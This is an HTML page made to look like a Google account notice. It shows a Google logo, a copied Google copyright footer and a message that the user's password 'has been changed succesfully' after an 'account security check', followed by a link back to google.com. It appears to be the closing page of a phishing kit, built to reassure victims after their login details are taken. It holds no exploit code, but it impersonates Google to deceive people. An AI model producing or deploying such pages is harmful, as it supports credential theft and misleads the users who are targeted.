<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title></title><link rel="stylesheet" href="css/styles.css">
  </head>
  <body class="body3">
    <div class="completedlast">
    <h1><img src="imagesgmail/google1.png" alt=""></h1>
    <h3 class="last3"> Your password has been changed succesfully,
      Thank you for going through your account security check.
      We are glad that you are safe.</h3>

      <!-- <br> -->


  <!-- <p>Click <a href="https//www.google.com">here</a> to go back to google main page</p> -->
  To go back to google main page click <button class="googlebutton" type="button" name="button">
    <a href="https://www.google.com">Here</a></button>
  <p class="last">we recommend you to know about the important changes to your Google Account and services.
© 2020 Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</p></div>
  </body>
</html>
